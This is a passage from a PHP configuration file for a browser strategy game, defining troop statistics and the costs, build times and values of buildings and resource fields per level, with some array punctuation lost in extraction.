'research_time_consume' => 10800,

'training_time_consume' => 3240,

'trainer_building' => array( 20,30 ),

'research_resources' => array( '1' => 2320, '2' => 1180, '3' => 2520, '4' => 610 ),

'training_resources'   => array( '1' => 825, '2' => 660, '3' => 480, '4' => 150 ),

'pre_requests' => array( '22' => 5, '20' => 5 )


'105'=> array(

'for_tribe_id' => 7, 'velocity' => 10, 'carry_load' => 65, 'crop_consumption' => 4, 'attack_value' => 170, 'defense_infantry' => 140, 'defense_cavalry' => 80, 'is_cavalry' => TRUE, 

'gold_needed'=> 2,

'research_time_consume' => 12900,

'training_time_consume' => 4120,

'trainer_building' => array( 20,30 ),

'research_resources' => array( '1' => 2800, '2' => 2160, '3' => 4040, '4' => 640 ),

'training_resources'   => array( '1' => 825, '2' => 960, '3' => 1200, '4' => 270 ),

'pre_requests' => array( '22' => 15, '20' => 10 )


'106'=> array(

'for_tribe_id' => 7, 'velocity' => 4, 'carry_load' => 0, 'crop_consumption' => 3, 'attack_value' => 60, 'defense_infantry' => 30, 'defense_cavalry' => 75, 'is_cavalry' => FALSE, 

'gold_needed'=> 3,

'research_time_consume' => 14400,

'training_time_consume' => 6400,

'trainer_building' => array( 21 ),

'research_resources' => array( '1' => 6100, '2' => 1300, '3' => 3000, '4' => 580 ),

'training_resources'   => array( '1' => 1350, '2' => 540, '3' => 750, '4' => 105 ),

'pre_requests' => array( '22' => 10, '21' => 1 )


'107'=> array(

'for_tribe_id' => 7, 'velocity' => 3, 'carry_load' => 0, 'crop_consumption' => 6, 'attack_value' => 60, 'defense_infantry' => 45, 'defense_cavalry' => 10, 'is_cavalry' => FALSE, 

'gold_needed'=> 3,

'research_time_consume' => 28800,

'training_time_consume' => 10800,

'trainer_building' => array( 21 ),

'research_resources' => array( '1' => 5500, '2' => 4900, '3' => 5000, '4' => 520 ),

'training_resources'   => array( '1' => 1425, '2' => 2025, '3' => 900, '4' => 135 ),

'pre_requests' => array( '21' => 10, '22' => 15 )


'108'=> array(

'for_tribe_id' => 7, 'velocity' => 4, 'carry_load' => 0, 'crop_consumption' => 5, 'attack_value' => 80, 'defense_infantry' => 50, 'defense_cavalry' => 50, 'is_cavalry' => FALSE, 

'gold_needed'=> 0,

'research_time_consume' => 19425,

'training_time_consume' => 94300,

'trainer_building' => array( 25,26 ),

'research_resources' => array( '1' => 18250, '2' => 13500, '3' => 20400, '4' => 16480 ),

'training_resources'   => array( '1' => 46125, '2' => 40800, '3' => 67500, '4' => 65250 ),

'pre_requests' => array( '16' => 10, '22' => 20 )


'109'=> array(

'for_tribe_id' => 7, 'velocity' => 5, 'carry_load' => 3000, 'crop_consumption' => 1, 'attack_value' => 30, 'defense_infantry' => 40, 'defense_cavalry' => 40, 'is_cavalry' => FALSE, 

'gold_needed'=> 0,

'research_time_consume' => 0,

'training_time_consume' => 30500,

'trainer_building' => array( 25,26 ),

'research_resources' => array(),

'training_resources'   => array( '1' => 8700, '2' => 7950, '3' => 10800, '4' => 8250 ),

'pre_requests' => array(  ),

'help_pre_requests' => array( '26|25' => 10 )




 *  the game items ( buildings and fields )

 *    key is the id of the item

 *    support_multiple: can build extra-items of it, only when building at least one item and reaching it to its maximum level

 *    built_in_capital: can build into capital village

 *    built_in_non_capital: can build into none capital village

 *    built_in_special_only: buld only into the special village

 *    max_lvl_in_non_capital: maximum level can be reached into the non capital village, if equal NULL this mean that maximum level in non capital as in the capital village

 *    for_tribe_id: array for tribes ( tribe_id => value factor )

 *    pre_requests: array for ( item_id => item level ), if item level is equal NULL then to build this item the null item must not be exists

 *    levels: 

 *    array for item levels


'items' => array (

'1'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => 10,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( ),

'levels'=> array(


'value' => 5, 'time_consume' => 260, 'cp' => 1, 'people_inc' => 2,

'resources' => array( '1' => 40, '2' => 100, '3' => 50, '4' => 60 )



'value' => 9, 'time_consume' => 620, 'cp' => 1, 'people_inc' => 1,

'resources' => array( '1' => 65, '2' => 165, '3' => 85, '4' => 100 )



'value' => 15, 'time_consume' => 1190, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 110, '2' => 280, '3' => 140, '4' => 165 )



'value' => 22, 'time_consume' => 2100, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 185, '2' => 465, '3' => 235, '4' => 280 )



'value' => 33, 'time_consume' => 3560, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 310, '2' => 780, '3' => 390, '4' => 465 )



'value' => 50, 'time_consume' => 5890, 'cp' => 3, 'people_inc' => 2,

'resources' => array( '1' => 520, '2' => 1300, '3' => 650, '4' => 780 )



'value' => 70, 'time_consume' => 9620, 'cp' => 4, 'people_inc' => 2,

'resources' => array( '1' => 870, '2' => 2170, '3' => 1085, '4' => 1300 )



'value' => 100, 'time_consume' => 15590, 'cp' => 4, 'people_inc' => 2,

'resources' => array( '1' => 1450, '2' => 3625, '3' => 1810, '4' => 2175 )



'value' => 145, 'time_consume' => 25150, 'cp' => 5, 'people_inc' => 2,

'resources' => array( '1' => 2420, '2' => 6050, '3' => 3025, '4' => 3630 )



'value' => 200, 'time_consume' => 40440, 'cp' => 6, 'people_inc' => 2,

'resources' => array( '1' => 4040, '2' => 10105, '3' => 5050, '4' => 6060 )



'value' => 280, 'time_consume' => 64900, 'cp' => 7, 'people_inc' => 2,

'resources' => array( '1' => 6750, '2' => 16870, '3' => 8435, '4' => 10125 )



'value' => 375, 'time_consume' => 104050, 'cp' => 9, 'people_inc' => 2,

'resources' => array( '1' => 11270, '2' => 28175, '3' => 14090, '4' => 16905 )



'value' => 495, 'time_consume' => 166680, 'cp' => 11, 'people_inc' => 2,

'resources' => array( '1' => 18820, '2' => 47055, '3' => 23525, '4' => 28230 )



'value' => 635, 'time_consume' => 266880, 'cp' => 13, 'people_inc' => 2,

'resources' => array( '1' => 31430, '2' => 78580, '3' => 39290, '4' => 47150 )



'value' => 800, 'time_consume' => 427210, 'cp' => 15, 'people_inc' => 2,

'resources' => array( '1' => 52490, '2' => 131230, '3' => 65615, '4' => 78740 )



'value' => 1000, 'time_consume' => 683730, 'cp' => 18, 'people_inc' => 3,

'resources' => array( '1' => 87660, '2' => 219155, '3' => 109575, '4' => 131490 )



'value' => 1300, 'time_consume' => 1094170, 'cp' => 22, 'people_inc' => 3,

'resources' => array( '1' => 146395, '2' => 365985, '3' => 182995, '4' => 219590 )



'value' => 1600, 'time_consume' => 1750880, 'cp' => 27, 'people_inc' => 3,

'resources' => array( '1' => 244480, '2' => 611195, '3' => 305600, '4' => 366715 )



'value' => 2000, 'time_consume' => 2801600, 'cp' => 32, 'people_inc' => 3,

'resources' => array( '1' => 408280, '2' => 1020695, '3' => 510350, '4' => 612420 )



'value' => 2450, 'time_consume' => 4482770, 'cp' => 38, 'people_inc' => 3,

'resources' => array( '1' => 681825, '2' => 1704565, '3' => 852280, '4' => 1022740 )




'2'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => 10,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( ),

'levels'=> array(


'value' => 5, 'time_consume' => 220, 'cp' => 1, 'people_inc' => 2,

'resources' => array( '1' => 80, '2' => 40, '3' => 80, '4' => 50 )



'value' => 9, 'time_consume' => 550, 'cp' => 1, 'people_inc' => 1,

'resources' => array( '1' => 135, '2' => 65, '3' => 135, '4' => 85 )



'value' => 15, 'time_consume' => 1080, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 225, '2' => 110, '3' => 225, '4' => 140 )



'value' => 22, 'time_consume' => 1930, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 375, '2' => 185, '3' => 375, '4' => 235 )



'value' => 33, 'time_consume' => 3290, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 620, '2' => 310, '3' => 620, '4' => 390 )



'value' => 50, 'time_consume' => 5470, 'cp' => 3, 'people_inc' => 2,

'resources' => array( '1' => 1040, '2' => 520, '3' => 1040, '4' => 650 )



'value' => 70, 'time_consume' => 8950, 'cp' => 4, 'people_inc' => 2,

'resources' => array( '1' => 1735, '2' => 870, '3' => 1735, '4' => 1085 )



'value' => 100, 'time_consume' => 14520, 'cp' => 4, 'people_inc' => 2,

'resources' => array( '1' => 2900, '2' => 1450, '3' => 2900, '4' => 1810 )



'value' => 145, 'time_consume' => 23430, 'cp' => 5, 'people_inc' => 2,

'resources' => array( '1' => 4840, '2' => 2420, '3' => 4840, '4' => 3025 )



'value' => 200, 'time_consume' => 37690, 'cp' => 6, 'people_inc' => 2,

'resources' => array( '1' => 8080, '2' => 4040, '3' => 8080, '4' => 5050 )



'value' => 280, 'time_consume' => 60510, 'cp' => 7, 'people_inc' => 2,

'resources' => array( '1' => 13500, '2' => 6750, '3' => 13500, '4' => 8435 )



'value' => 375, 'time_consume' => 97010, 'cp' => 9, 'people_inc' => 2,

'resources' => array( '1' => 22540, '2' => 11270, '3' => 22540, '4' => 14090 )



'value' => 495, 'time_consume' => 155420, 'cp' => 11, 'people_inc' => 2,

'resources' => array( '1' => 37645, '2' => 18820, '3' => 37645, '4' => 23525 )



'value' => 635, 'time_consume' => 248870, 'cp' => 13, 'people_inc' => 2,

'resources' => array( '1' => 62865, '2' => 31430, '3' => 62865, '4' => 39290 )



'value' => 800, 'time_consume' => 398390, 'cp' => 15, 'people_inc' => 2,

'resources' => array( '1' => 104985, '2' => 52490, '3' => 104985, '4' => 65615 )



'value' => 1000, 'time_consume' => 637620, 'cp' => 18, 'people_inc' => 3,

'resources' => array( '1' => 175320, '2' => 87660, '3' => 175320, '4' => 109575 )



'value' => 1300, 'time_consume' => 1020390, 'cp' => 22, 'people_inc' => 3,

'resources' => array( '1' => 292790, '2' => 146395, '3' => 292790, '4' => 182995 )



'value' => 1600, 'time_consume' => 1632820, 'cp' => 27, 'people_inc' => 3,

'resources' => array( '1' => 488955, '2' => 244480, '3' => 488955, '4' => 305600 )



'value' => 2000, 'time_consume' => 2612710, 'cp' => 32, 'people_inc' => 3,

'resources' => array( '1' => 816555, '2' => 408280, '3' => 816555, '4' => 510350 )



'value' => 2450, 'time_consume' => 4180540, 'cp' => 38, 'people_inc' => 3,

'resources' => array( '1' => 1363650, '2' => 681825, '3' => 1363650, '4' => 852280 )




'3'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => 10,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( ),

'levels'=> array(


'value' => 5, 'time_consume' => 450, 'cp' => 1, 'people_inc' => 3,

'resources' => array( '1' => 100, '2' => 80, '3' => 30, '4' => 60 )



'value' => 9, 'time_consume' => 920, 'cp' => 1, 'people_inc' => 2,

'resources' => array( '1' => 165, '2' => 135, '3' => 50, '4' => 100 )



'value' => 15, 'time_consume' => 1670, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 280, '2' => 225, '3' => 85, '4' => 165 )



'value' => 22, 'time_consume' => 2880, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 465, '2' => 375, '3' => 140, '4' => 280 )



'value' => 33, 'time_consume' => 4800, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 780, '2' => 620, '3' => 235, '4' => 465 )



'value' => 50, 'time_consume' => 7880, 'cp' => 3, 'people_inc' => 2,

'resources' => array( '1' => 1300, '2' => 1040, '3' => 390, '4' => 780 )



'value' => 70, 'time_consume' => 12810, 'cp' => 4, 'people_inc' => 2,

'resources' => array( '1' => 2170, '2' => 1735, '3' => 650, '4' => 1300 )



'value' => 100, 'time_consume' => 20690, 'cp' => 4, 'people_inc' => 2,

'resources' => array( '1' => 3625, '2' => 2900, '3' => 1085, '4' => 2175 )



'value' => 145, 'time_consume' => 33310, 'cp' => 5, 'people_inc' => 2,

'resources' => array( '1' => 6050, '2' => 4840, '3' => 1815, '4' => 3630 )



'value' => 200, 'time_consume' => 53500, 'cp' => 6, 'people_inc' => 2,

'resources' => array( '1' => 10105, '2' => 8080, '3' => 3030, '4' => 6060 )



'value' => 280, 'time_consume' => 85800, 'cp' => 7, 'people_inc' => 3,

'resources' => array( '1' => 16870, '2' => 13500, '3' => 5060, '4' => 10125 )



'value' => 375, 'time_consume' => 137470, 'cp' => 9, 'people_inc' => 3,

'resources' => array( '1' => 28175, '2' => 22540, '3' => 8455, '4' => 16905 )



'value' => 495, 'time_consume' => 220160, 'cp' => 11, 'people_inc' => 3,

'resources' => array( '1' => 47055, '2' => 37645, '3' => 14115, '4' => 28230 )



'value' => 635, 'time_consume' => 352450, 'cp' => 13, 'people_inc' => 3,

'resources' => array( '1' => 78580, '2' => 62865, '3' => 23575, '4' => 47150 )



'value' => 800, 'time_consume' => 564120, 'cp' => 15, 'people_inc' => 3,

'resources' => array( '1' => 131230, '2' => 104985, '3' => 39370, '4' => 78740 )



'value' => 1000, 'time_consume' => 902790, 'cp' => 18, 'people_inc' => 3,

'resources' => array( '1' => 219155, '2' => 175320, '3' => 65745, '4' => 131490 )



'value' => 1300, 'time_consume' => 1444660, 'cp' => 22, 'people_inc' => 3,

'resources' => array( '1' => 365985, '2' => 292790, '3' => 109795, '4' => 219590 )



'value' => 1600, 'time_consume' => 2311660, 'cp' => 27, 'people_inc' => 3,

'resources' => array( '1' => 611195, '2' => 488955, '3' => 183360, '4' => 366715 )



'value' => 2000, 'time_consume' => 3698850, 'cp' => 32, 'people_inc' => 3,

'resources' => array( '1' => 1020695, '2' => 816555, '3' => 306210, '4' => 612420 )



'value' => 2450, 'time_consume' => 5918370, 'cp' => 38, 'people_inc' => 3,

'resources' => array( '1' => 1704565, '2' => 1363650, '3' => 511370, '4' => 1022740 )




'4'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => 10,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( ),

'levels'=> array(


'value' => 5, 'time_consume' => 150, 'cp' => 1, 'people_inc' => 0,

'resources' => array( '1' => 70, '2' => 90, '3' => 70, '4' => 20 )



'value' => 9, 'time_consume' => 440, 'cp' => 1, 'people_inc' => 0,

'resources' => array( '1' => 115, '2' => 150, '3' => 115, '4' => 35 )



'value' => 15, 'time_consume' => 900, 'cp' => 2, 'people_inc' => 0,

'resources' => array( '1' => 195, '2' => 250, '3' => 195, '4' => 55 )



'value' => 22, 'time_consume' => 1650, 'cp' => 2, 'people_inc' => 0,

'resources' => array( '1' => 325, '2' => 420, '3' => 325, '4' => 95 )



'value' => 33, 'time_consume' => 2830, 'cp' => 2, 'people_inc' => 0,

'resources' => array( '1' => 545, '2' => 700, '3' => 545, '4' => 155 )



'value' => 50, 'time_consume' => 4730, 'cp' => 3, 'people_inc' => 1,

'resources' => array( '1' => 910, '2' => 1170, '3' => 910, '4' => 260 )



'value' => 70, 'time_consume' => 7780, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 1520, '2' => 1950, '3' => 1520, '4' => 435 )



'value' => 100, 'time_consume' => 12640, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 2535, '2' => 3260, '3' => 2535, '4' => 725 )



'value' => 145, 'time_consume' => 20430, 'cp' => 5, 'people_inc' => 1,

'resources' => array( '1' => 4235, '2' => 5445, '3' => 4235, '4' => 1210 )



'value' => 200, 'time_consume' => 32880, 'cp' => 6, 'people_inc' => 1,

'resources' => array( '1' => 7070, '2' => 9095, '3' => 7070, '4' => 2020 )



'value' => 280, 'time_consume' => 52810, 'cp' => 7, 'people_inc' => 1,

'resources' => array( '1' => 11810, '2' => 15185, '3' => 11810, '4' => 3375 )



'value' => 375, 'time_consume' => 84700, 'cp' => 9, 'people_inc' => 1,

'resources' => array( '1' => 19725, '2' => 25360, '3' => 19725, '4' => 5635 )



'value' => 495, 'time_consume' => 135710, 'cp' => 11, 'people_inc' => 1,

'resources' => array( '1' => 32940, '2' => 42350, '3' => 32940, '4' => 9410 )



'value' => 635, 'time_consume' => 217340, 'cp' => 13, 'people_inc' => 1,

'resources' => array( '1' => 55005, '2' => 70720, '3' => 55005, '4' => 15715 )



'value' => 800, 'time_consume' => 347950, 'cp' => 15, 'people_inc' => 1,

'resources' => array( '1' => 91860, '2' => 118105, '3' => 91860, '4' => 26245 )



'value' => 1000, 'time_consume' => 556910, 'cp' => 18, 'people_inc' => 2,

'resources' => array( '1' => 153405, '2' => 197240, '3' => 153405, '4' => 43830 )



'value' => 1300, 'time_consume' => 891260, 'cp' => 22, 'people_inc' => 2,

'resources' => array( '1' => 256190, '2' => 329385, '3' => 256190, '4' => 73195 )



'value' => 1600, 'time_consume' => 1426210, 'cp' => 27, 'people_inc' => 2,

'resources' => array( '1' => 427835, '2' => 550075, '3' => 427835, '4' => 122240 )



'value' => 2000, 'time_consume' => 2282140, 'cp' => 32, 'people_inc' => 2,

'resources' => array( '1' => 714485, '2' => 918625, '3' => 714485, '4' => 204140 )



'value' => 2450, 'time_consume' => 3651630, 'cp' => 38, 'people_inc' => 2,

'resources' => array( '1' => 1193195, '2' => 1534105, '3' => 1193195, '4' => 340915 )




'5'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '1' => 10, '15' => 5 ),

'levels'=> array(


'value' => 5, 'time_consume' => 3000, 'cp' => 1, 'people_inc' => 4,

'resources' => array( '1' => 520, '2' => 380, '3' => 290, '4' => 90 )



'value' => 10, 'time_consume' => 5700, 'cp' => 1, 'people_inc' => 2,

'resources' => array( '1' => 935, '2' => 685, '3' => 520, '4' => 160 )



'value' => 15, 'time_consume' => 9750, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 1685, '2' => 1230, '3' => 940, '4' => 290 )



'value' => 20, 'time_consume' => 15830, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 3035, '2' => 2215, '3' => 1690, '4' => 525 )



'value' => 25, 'time_consume' => 24940, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 5460, '2' => 3990, '3' => 3045, '4' => 945 )




'6'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '2' => 10, '15' => 5 ),

'levels'=> array(


'value' => 5, 'time_consume' => 2240, 'cp' => 1, 'people_inc' => 3,

'resources' => array( '1' => 440, '2' => 480, '3' => 320, '4' => 50 )



'value' => 10, 'time_consume' => 4560, 'cp' => 1, 'people_inc' => 2,

'resources' => array( '1' => 790, '2' => 865, '3' => 575, '4' => 90 )



'value' => 15, 'time_consume' => 8040, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 1425, '2' => 1555, '3' => 1035, '4' => 160 )



'value' => 20, 'time_consume' => 13260, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 2565, '2' => 2800, '3' => 1865, '4' => 290 )



'value' => 25, 'time_consume' => 21090, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 4620, '2' => 5040, '3' => 3360, '4' => 525 )




'7'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '3' => 10, '15' => 5 ),

'levels'=> array(


'value' => 5, 'time_consume' => 4080, 'cp' => 1, 'people_inc' => 6,

'resources' => array( '1' => 200, '2' => 450, '3' => 510, '4' => 120 )



'value' => 10, 'time_consume' => 7320, 'cp' => 1, 'people_inc' => 3,

'resources' => array( '1' => 360, '2' => 810, '3' => 920, '4' => 215 )



'value' => 15, 'time_consume' => 12180, 'cp' => 2, 'people_inc' => 3,

'resources' => array( '1' => 650, '2' => 1460, '3' => 1650, '4' => 390 )



'value' => 20, 'time_consume' => 19470, 'cp' => 2, 'people_inc' => 3,

'resources' => array( '1' => 1165, '2' => 2625, '3' => 2975, '4' => 700 )



'value' => 25, 'time_consume' => 30410, 'cp' => 2, 'people_inc' => 3,

'resources' => array( '1' => 2100, '2' => 4725, '3' => 5355, '4' => 1260 )




'8'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '4' => 5 ),

'levels'=> array(


'value' => 5, 'time_consume' => 1840, 'cp' => 1, 'people_inc' => 3,

'resources' => array( '1' => 500, '2' => 440, '3' => 380, '4' => 1240 )



'value' => 10, 'time_consume' => 3960, 'cp' => 1, 'people_inc' => 2,

'resources' => array( '1' => 900, '2' => 790, '3' => 685, '4' => 2230 )



'value' => 15, 'time_consume' => 7140, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 1620, '2' => 1425, '3' => 1230, '4' => 4020 )



'value' => 20, 'time_consume' => 11910, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 2915, '2' => 2565, '3' => 2215, '4' => 7230 )



'value' => 25, 'time_consume' => 19070, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 5250, '2' => 4620, '3' => 3990, '4' => 13015 )




'9'=> array (

'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '4' => 10, '15' => 5, '8' => 5 ),

'levels'=> array(


'value' => 5, 'time_consume' => 3680, 'cp' => 1, 'people_inc' => 4,

'resources' => array( '1' => 1200, '2' => 1480, '3' => 870, '4' => 1600 )



'value' => 10, 'time_consume' => 6720, 'cp' => 1, 'people_inc' => 2,

'resources' => array( '1' => 2160, '2' => 2665, '3' => 1565, '4' => 2880 )



'value' => 15, 'time_consume' => 11280, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 3890, '2' => 4795, '3' => 2820, '4' => 5185 )



'value' => 20, 'time_consume' => 18120, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 7000, '2' => 8630, '3' => 5075, '4' => 9330 )



'value' => 25, 'time_consume' => 28380, 'cp' => 2, 'people_inc' => 2,

'resources' => array( '1' => 12595, '2' => 15535, '3' => 9135, '4' => 16795 )




'10'=> array (

'support_multiple' => TRUE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '15' => 1 ),

'levels'=> array(


'value' => 1700, 'time_consume' => 2000, 'cp' => 1, 'people_inc' => 1,

'resources' => array( '1' => 130, '2' => 160, '3' => 90, '4' => 40 )



'value' => 2000, 'time_consume' => 2620, 'cp' => 1, 'people_inc' => 1,

'resources' => array( '1' => 165, '2' => 205, '3' => 115, '4' => 50 )



'value' => 2500, 'time_consume' => 3340, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 215, '2' => 260, '3' => 145, '4' => 65 )



'value' => 3100, 'time_consume' => 4170, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 275, '2' => 335, '3' => 190, '4' => 85 )



'value' => 4000, 'time_consume' => 5140, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 350, '2' => 430, '3' => 240, '4' => 105 )



'value' => 5000, 'time_consume' => 6260, 'cp' => 3, 'people_inc' => 1,

'resources' => array( '1' => 445, '2' => 550, '3' => 310, '4' => 135 )



'value' => 6300, 'time_consume' => 7570, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 570, '2' => 705, '3' => 395, '4' => 175 )



'value' => 7800, 'time_consume' => 9080, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 730, '2' => 900, '3' => 505, '4' => 225 )



'value' => 9600, 'time_consume' => 10830, 'cp' => 5, 'people_inc' => 1,

'resources' => array( '1' => 935, '2' => 1155, '3' => 650, '4' => 290 )



'value' => 11800, 'time_consume' => 12860, 'cp' => 6, 'people_inc' => 1,

'resources' => array( '1' => 1200, '2' => 1475, '3' => 830, '4' => 370 )



'value' => 14400, 'time_consume' => 15220, 'cp' => 7, 'people_inc' => 2,

'resources' => array( '1' => 1535, '2' => 1890, '3' => 1065, '4' => 470 )



'value' => 17600, 'time_consume' => 17950, 'cp' => 9, 'people_inc' => 2,

'resources' => array( '1' => 1965, '2' => 2420, '3' => 1360, '4' => 605 )



'value' => 21400, 'time_consume' => 21130, 'cp' => 11, 'people_inc' => 2,

'resources' => array( '1' => 2515, '2' => 3095, '3' => 1740, '4' => 775 )



'value' => 25900, 'time_consume' => 24810, 'cp' => 13, 'people_inc' => 2,

'resources' => array( '1' => 3220, '2' => 3960, '3' => 2230, '4' => 990 )



'value' => 31300, 'time_consume' => 29080, 'cp' => 15, 'people_inc' => 2,

'resources' => array( '1' => 4120, '2' => 5070, '3' => 2850, '4' => 1270 )



'value' => 37900, 'time_consume' => 34030, 'cp' => 18, 'people_inc' => 2,

'resources' => array( '1' => 5275, '2' => 6490, '3' => 3650, '4' => 1625 )



'value' => 45700, 'time_consume' => 39770, 'cp' => 22, 'people_inc' => 2,

'resources' => array( '1' => 6750, '2' => 8310, '3' => 4675, '4' => 2075 )



'value' => 55100, 'time_consume' => 46440, 'cp' => 27, 'people_inc' => 2,

'resources' => array( '1' => 8640, '2' => 10635, '3' => 5980, '4' => 2660 )



'value' => 66400, 'time_consume' => 54170, 'cp' => 32, 'people_inc' => 2,

'resources' => array( '1' => 11060, '2' => 13610, '3' => 7655, '4' => 3405 )



'value' => 80000, 'time_consume' => 63130, 'cp' => 38, 'people_inc' => 2,

'resources' => array( '1' => 14155, '2' => 17420, '3' => 9800, '4' => 4355 )




'11'=> array (

'support_multiple' => TRUE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '15' => 1 ),

'levels'=> array(


'value' => 1700, 'time_consume' => 1600, 'cp' => 1, 'people_inc' => 1,

'resources' => array( '1' => 80, '2' => 100, '3' => 70, '4' => 20 )



'value' => 2000, 'time_consume' => 2160, 'cp' => 1, 'people_inc' => 1,

'resources' => array( '1' => 100, '2' => 130, '3' => 90, '4' => 25 )



'value' => 2500, 'time_consume' => 2800, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 130, '2' => 165, '3' => 115, '4' => 35 )



'value' => 3100, 'time_consume' => 3550, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 170, '2' => 210, '3' => 145, '4' => 40 )



'value' => 4000, 'time_consume' => 4420, 'cp' => 2, 'people_inc' => 1,

'resources' => array( '1' => 215, '2' => 270, '3' => 190, '4' => 55 )



'value' => 5000, 'time_consume' => 5420, 'cp' => 3, 'people_inc' => 1,

'resources' => array( '1' => 275, '2' => 345, '3' => 240, '4' => 70 )



'value' => 6300, 'time_consume' => 6590, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 350, '2' => 440, '3' => 310, '4' => 90 )



'value' => 7800, 'time_consume' => 7950, 'cp' => 4, 'people_inc' => 1,

'resources' => array( '1' => 450, '2' => 565, '3' => 395, '4' => 115 )



'value' => 9600, 'time_consume' => 9520, 'cp' => 5, 'people_inc' => 1,

'resources' => array( '1' => 575, '2' => 720, '3' => 505, '4' => 145 )



'value' => 11800, 'time_consume' => 11340, 'cp' => 6, 'people_inc' => 1,

'resources' => array( '1' => 740, '2' => 920, '3' => 645, '4' => 185 )



'value' => 14400, 'time_consume' => 13450, 'cp' => 7, 'people_inc' => 2,

'resources' => array( '1' => 945, '2' => 1180, '3' => 825, '4' => 235 )



'value' => 17600, 'time_consume' => 15910, 'cp' => 9, 'people_inc' => 2,

'resources' => array( '1' => 1210, '2' => 1510, '3' => 1060, '4' => 300 )



'value' => 21400, 'time_consume' => 18750, 'cp' => 11, 'people_inc' => 2,

'resources' => array( '1' => 1545, '2' => 1935, '3' => 1355, '4' => 385 )



'value' => 25900, 'time_consume' => 22050, 'cp' => 13, 'people_inc' => 2,

'resources' => array( '1' => 1980, '2' => 2475, '3' => 1735, '4' => 495 )



'value' => 31300, 'time_consume' => 25880, 'cp' => 15, 'people_inc' => 2,

'resources' => array( '1' => 2535, '2' => 3170, '3' => 2220, '4' => 635 )



'value' => 37900, 'time_consume' => 30320, 'cp' => 18, 'people_inc' => 2,

